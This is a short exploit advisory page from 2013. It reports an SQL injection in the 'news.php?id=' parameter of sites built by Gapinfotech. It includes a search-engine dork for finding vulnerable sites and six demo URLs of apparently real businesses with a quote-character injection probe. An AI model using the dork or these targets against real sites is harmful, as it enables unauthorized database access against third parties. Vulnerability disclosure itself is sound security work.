Gapinfotech SQL Injection

2013.01.19
Credit: Ashiyane Digital Security Team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: \"Powered By : Web Design Gurgaon\" inurl:news.php?id=

############## # Exploit Title : Gapinfotech SQL Injection # # Exploit Author : Ashiyane Digital Security Team # # ven Home : www.gapinfotech.com # # Home : ww.ashiyane.org # # Security Risk : Medium - SQL Injection # # Dork : "Powered By : Web Design Gurgaon" inurl:news.php?id= # ############## #location: site/news.php?id=[SQL] # # #DEMO: # www.more-realtXy.com/news.php?id=7%27 # # www.futurerealtyXindia.com/news.php?id=2%27 # # www.rentnleaseXgurgaon.com/news.php?id=1%27 # # www.shubhamrXealty.com/news.php?id=9%27 # # www.minimumXbrokerage.com/news.php?id=2%27 # # www.merareXnter.com/news.php?id=6%27 # ############## #Greetz to: My Lord ALLAH ############## # #Amirh03in # ##############

References:

http://www.gapinfotech.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top